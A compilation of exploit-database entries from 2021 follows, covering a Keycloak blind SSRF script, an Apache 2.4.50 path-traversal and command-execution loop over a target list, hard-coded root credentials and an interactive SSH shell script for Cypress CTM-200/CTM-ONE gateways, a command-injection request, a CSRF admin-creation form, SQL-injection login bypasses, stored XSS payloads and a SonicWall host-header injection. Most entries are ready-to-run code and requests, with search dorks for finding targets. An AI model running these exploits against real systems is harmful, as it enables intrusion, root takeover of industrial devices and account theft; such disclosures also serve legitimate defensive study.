# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) # Date: 2021-10-09 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.keycloak.org/ # Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html # Version: versions < 12.0.2 # Tested on: Kali Linux # CVE : CVE-2020-10770 #!/usr/bin/env python3 import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : ./exploit.py -u http://127.0.0.1:8080 [^] Input Netcat host:port -> 192.168.0.1:4444 ''')) parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)") args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit() # Variables Host = args.url r = requests.session() def ssrf(): headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', } hook = input("[^] Input Netcat host:port -> ") _req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent) return True if __name__ == "__main__": print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ') try: if ssrf() == True: print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ') except Exception as ex: print('\n[-] Invalid URL or Target not Vulnerable')

# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) # Date: 10/05/2021 # Exploit Author: Lucas Souza https://lsass.io # Vendor Homepage: https://apache.org/ # Version: 2.4.50 # Tested on: 2.4.50 # CVE : CVE-2021-42013 # Credits: Ash Daulton and the cPanel Security Team #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] echo ./PoC.sh targets.txt /etc/passwd echo ./PoC.sh targets.txt /bin/sh id exit fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done # PoC.sh targets.txt /etc/passwd # PoC.sh targets.txt /bin/sh whoami

# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH) # Date: 21.09.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.cypress.bc.ca #!/usr/bin/env python3 # # # Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH) # # # Vendor: Cypress Solutions Inc. # Product web page: https://www.cypress.bc.ca # Affected version: CTM-ONE (1.3.6-latest) # CTM-ONE (1.3.1) # CTM-ONE (1.1.9) # CTM200 (2.7.1.5659-latest) # CTM200 (2.0.5.3356-184) # # Summary: CTM-200 is the industrial cellular wireless gateway for fixed # and mobile applications. The CTM-200 is a Linux based platform powered # by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard # features make the CTM-200 ideal for mobile fleet applications or fixed # site office and SCADA communications. # # CTM-ONE is the industrial LTE cellular wireless gateway for mobile and # fixed applications. CTM-ONE is your next generation of gateway for fleet # tracking and fixed sites. # # ====================================================================== # CTM-200 # /var/config/passwd: # ------------------- # root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash # admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash # nobody:*:65534:65534:nobody:/var:/bin/false # daemon:*:65534:65534:daemon:/var:/bin/false # # /var/config/advanced.ini: # ------------------------- # 0 # 0 # Chameleon # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # # # CTM-ONE # /etc/shadow: # ------------ # admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7::: # root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7::: # daemon:*:16009:0:99999:7::: # bin:*:16009:0:99999:7::: # sys:*:16009:0:99999:7::: # ftp:*:16009:0:99999:7::: # nobody:*:16009:0:99999:7::: # messagebus:!:16009:0:99999:7::: # ====================================================================== # # Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials # within their Linux distribution image. This weakness can lead to the # exposure of resources or functionality to unintended actors, providing # attackers with sensitive information including executing arbitrary code. # # Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l) # GNU/Linux 2.6.32.25 (arm4tl) # lighttpd/1.4.39 # BusyBox v1.24.1 # BusyBox v1.15.3 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5686 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php # # # 21.09.2021 # import sys import paramiko bnr=''' o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o │ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │ o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o ''' print(bnr) if len(sys.argv)<2: print('Put an IP.') sys.exit() adrs=sys.argv[1]## unme='root'#admin# pwrd='Chameleon'## rsh=paramiko.SSHClient() rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) rsh.connect(adrs,username=unme,password=pwrd) while 1: cmnd=input('# ') if cmnd=='exit': break stdin,stdout,stderr=rsh.exec_command(cmnd) stdin.close() print(str(stdout.read().decode())) rsh.close()

# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection # Date: 21.09.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.cypress.bc.ca Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection Vendor: Cypress Solutions Inc. Product web page: https://www.cypress.bc.ca Affected version: 2.7.1.5659 2.0.5.3356-184 Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications. The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site office and SCADA communications. Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to the wget command in /usr/bin/cmdmain ELF binary. ================================================================================================ /www/cgi-bin/webif/ctm-config-upgrade.sh: ----------------------------------------- 136: if ! empty "$FORM_install_fw_url"; then 137: echo "</pre>" 138: echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>" 139: cmd upgradefw "$FORM_fw_url" 140: unset FORM_install_fw_url FORM_submit 141: echo "</pre><br />Done." 142: fi ================================================================== cmdmain (ELF): memset(&DAT_0003bd1c,0,0x80); make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c); sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8), *(undefined4 *)(iParm2 + 8)); ctmsys(local_184); sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8)); iVar3 = ctm_fopen(local_184,"r"); if (iVar3 == 0) { uVar5 = *(undefined4 *)(iParm2 + 8); __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &"; goto LAB_0001f4a8; } ctm_fclose(); memset(local_184,0,0x100); sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8), *(undefined4 *)(iParm2 + 8)); ctmsys(local_184); ================================================================= cmd (ELF): while (sVar1 = strlen(__s2), uVar7 < sVar1) { __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2); __s2 = *ppcVar8; uVar7 = uVar7 + 1; } uStack180 = 0x7273752f; uStack176 = 0x6e69622f; uStack172 = 0x646d632f; uStack168 = 0x6d632f73; uStack164 = 0x69616d64; uStack160 = 0x6e; uStack159 = 0; iVar2 = execv((char *)&uStack180,ppcParm2); ================================================================================================ Tested on: GNU/Linux 2.6.32.25 (arm4tl) BusyBox v1.15.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5687 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php 21.09.2021 -- PoC POST request: ----------------- POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1 Host: 192.168.1.100 Connection: keep-alive Content-Length: 611 Cache-Control: max-age=0 Authorization: Basic YWRtaW46Q2hhbWVsZW9u Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cookie: style=null sec-gpc: 1 ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="submit" 1 ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="upgradefile"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="fw_url" `id` ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="install_fw_url" Start Firmware Upgrade from URL ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="pkgurl" ------WebKitFormBoundaryZlABvwQnpLtpe9mM-- Response: --------- HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http: //www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http: //www.w3.org/1999/xhtml" lang="en" xml:lang="en"> ... ... Firmware Management Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway! Saving configuration ... downloading firmware image: gid=0(root)/uid=0(root).tar found image: extracting image files Verifying checksum of downloaded firmware image Image checksum failed OK Done. ... ... </div> <br /> <fieldset id="save"> <legend><strong>Proceed Changes</strong></legend> <div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div> <ul class="apply"> <li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li> </ul> </fieldset> </form> <hr /> <div id="footer"> <h3>X-Wrt</h3> <em>End user extensions for OpenWrt</em> </div> </div> <!-- End #container --> </body> </html>

# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF) # Date: 10/11/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Version: 1 # Tested on: Windows 10 Detail: The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request. CSRF PoC: -------------------------------------------------------------------------------------- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="fullname" value="Mrt" /> <input type="hidden" name="username" value="NewAdmin" /> <input type="hidden" name="type" value="1" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> --------------------------------------------------------------------------------------

# Exploit Title: Simple Issue Tracker System 1.0 - SQLi Authentication Bypass # Date: 11.10.2021 # Exploit Author: Bekir Bugra TURKOGLU # Vendor Homepage: https://www.sourcecodester.com/php/14938/simple-issue-tracker-system-project-using-php-and-sqlite-free-download.html # Software Link: https://www.sourcecodester.com/download-code?nid=14938&title=Simple+Issue+Tracker+System+Project+using+PHP+and+SQLite+Source+Code+Free+Download # Version: 1.0 # Tested on: Windows 10, Kali Linux # Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/issue_tracker/login.php 2 - Enter the payload to username field as "admin" or " ' OR 1 -- - " and enter any character in the password field. 3 - Click on "Login" button and successful login. PoC POST /issue_tracker/Actions.php?a=login HTTP/1.1 Host: 192.168.0.111 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 31 Origin: http://localhost Connection: close Referer: http://localhost/issue_tracker/login.php Cookie: PHPSESSID=71bod5tipklk329lpsoqkvfcb9 username='+OR+1+--+-&password=1

# Exploit Title: Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass # Date: 11.10.2021 # Exploit Author: Oguzhan Kara # Vendor Homepage: https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14929&title=Online+Learning+System+V2+using+PHP+Free+Source+Code # Version: 2.0 # Tested on: Kali Linux, Windows 10 - XAMPP # Online Learning System v2.0 Login pages can be bypassed with a simple SQLi to the username/facultyID/studentID parameters. Steps To Reproduce: 1 - Go to one of the login portals 2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes ("bypass" is can be anything in this scenario) and type anything you want to the password field. 3 - Click on "Login" button and you are logged in as first user in database, which is admin user for admin portal. PoC ---Admin Portal--- POST /elearning/classes/Login.php?f=login HTTP/1.1 Host: localhost Content-Length: 45 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/elearning/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 Connection: close username=bypass'+or+1%3D1--+-&password=bypass ---Faculty Portal--- POST /elearning/classes/Login.php?f=flogin HTTP/1.1 Host: localhost Content-Length: 47 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/elearning/faculty/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 Connection: close faculty_id=bypass'+or+1%3D1--+-&password=bypass ---Student Portal--- POST /elearning/classes/Login.php?f=slogin HTTP/1.1 Host: localhost Content-Length: 45 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/elearning/student/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 Connection: close student_id=bypass'+or+1%3D1--+-&password=test

# Exploit Title: Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS) # Date: 11.10.2021 # Exploit Author: Hüseyin Serkan Balkanli # Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Student Quarterly Grading System v1.0 has Stored XSS at "Add New Class" Function. Steps To Reproduce: 1 - Click to Class from Menu and click "Add New". 2 - Enter the payload to "grade" field as "<script>alert(document.cookie);</script>" without double-quotes and choose one of the Subject from list. (It can be anything, doesn't matter.) 3 - Click on Save and you are done. It's gonna be triggered when anyone visits the application. It's global and can trigger on any page. PoC POST /grading_system/Actions.php?a=save_class HTTP/1.1 Host: localhost Content-Length: 457 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO6Q8ADzs1UvBltkB X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/grading_system/?page=class Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 Connection: close ------WebKitFormBoundaryO6Q8ADzs1UvBltkB Content-Disposition: form-data; name="id" ------WebKitFormBoundaryO6Q8ADzs1UvBltkB Content-Disposition: form-data; name="subject_id" 3 ------WebKitFormBoundaryO6Q8ADzs1UvBltkB Content-Disposition: form-data; name="grade" <script>alert(document.cookie);</script> ------WebKitFormBoundaryO6Q8ADzs1UvBltkB Content-Disposition: form-data; name="section" ------WebKitFormBoundaryO6Q8ADzs1UvBltkB--

# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection # Google Dork: inurl:"auth.html" intitle:"SonicWall" # intitle:"SonicWall Analyzer Login" # Discovered Date: 03/09/2020 # Reported Date: 07/09/2020 # Exploit Author: Ramikan # Vendor Homepage:sonicwall.com # Affected Devices: All SonicWall Next Gen 6 Devices # Tested On: SonicWall NAS 6.2.5 # Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3 # Fixed Version:Gen6 firmware 6.5.4.8-89n # CVE : CVE-2021-20031 # CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) # Category:Hardware, Web Apps # Reference : https://github.com/Ramikan/Vulnerabilities/ ************************************************************************************************************************************* Vulnerability 1: Host Header Injection ************************************************************************************************************************************* Description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack Impact: Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the HTTP response, below are the two lines. var jumpURL = "https://fakedomain.com/auth.html"; ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> ************************************************************************************************************************************* Normal Request ************************************************************************************************************************************* GET / HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ************************************************************************************************************************************* Normal Response ************************************************************************************************************************************* HTTP/1.0 200 OK Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html; charset=UTF-8; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> ++++++++++++++++++snipped+++++++++++++++++++++++ </head> <body class="login_bg"> <div class="login_outer"> <div class="login_inner"> <div class="vgap48"></div> <div class="login_logo"> <img src="logo_sw.png"> </div> <div class="login_prodname"> Network Security Appliance </div> <div class="vgap48"></div> <div class="login_msg_header"> Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a> </div> <div class="vgap24"></div> </div> </div> </body> </html> ************************************************************************************************************************************* POC ************************************************************************************************************************************* Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the response, below are the two lines. var jumpURL = "https://fakedomain.com/auth.html"; ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> ************************************************************************************************************************************* Request: ************************************************************************************************************************************* GET / HTTP/1.1 Host: fakedomain.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Upgrade-Insecure-Requests: 1 Connection: close Cookie: temp= ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.0 200 OK Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html; charset=UTF-8; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Type" content="text/html"> <title>Document Moved</title> <meta name="id" content="docJump" > <link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css"> <link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css"> <script type="text/JavaScript"> var resetSecureFlag = false; setTimeout("goJump();", 1000); function goJump() { var jumpURL = "https://fakedomain.com/auth.html"; var jumpProt = jumpURL.substr(0,6).toLowerCase(); var ix; if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) { jumpProt = jumpProt.substr(0,ix+1); if (location.protocol.toLowerCase() != jumpProt) { window.opener = null; top.opener = null; } } if (resetSecureFlag) { var sessId = getCookie("SessId"); var pageSeed = swlStore.get("PageSeed", {isGlobal: true}); if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); } if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); } } top.location.href = jumpURL; } function setCookie(key, value) { var argv = setCookie.arguments; var argc = setCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = key + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } function getCookie(key) { if (document.cookie.length) { var cookies = ' ' + document.cookie; var start = cookies.indexOf(' ' + key + '='); if (start == -1) { return null; } var end = cookies.indexOf(";", start); if (end == -1) { end = cookies.length; } end -= start; var cookie = cookies.substr(start,end); return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1)); } else { return null; } } </script> </head> <body class="login_bg"> <div class="login_outer"> <div class="login_inner"> <div class="vgap48"></div> <div class="login_logo"> <img src="logo_sw.png"> </div> <div class="login_prodname"> Network Security Appliance </div> <div class="vgap48"></div> <div class="login_msg_header"> Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a> </div> <div class="vgap24"></div> </div> </div> </body> </html> The redirection is happening to https://fakedomain.com/auth.html. ************************************************************************************************************************************* Attack Vector: ************************************************************************************************************************************* Can be used for domain fronting. curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device" ************************************************************************************************************************************* Vendor Response: ************************************************************************************************************************************* Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) - fix is provided with a CLI option > configure > administration > enforce-http-host-check, to avoid Host header redirection. Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 *************************************************************************************************************************************

# Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS) # Shodan Dork: Search Logitech Media Server # Date: 12.10.2021 # Exploit Author: Mert Das # Vendor Homepage: www.logitech.com # Version: 8.2.0 # Tested on: Windows 10, Linux POC: 1. Go to Settings / Interface tab 2. Add payload to Title section 3. Payload : "><img src=1 onerror=alert(1)> 4. Alert will popup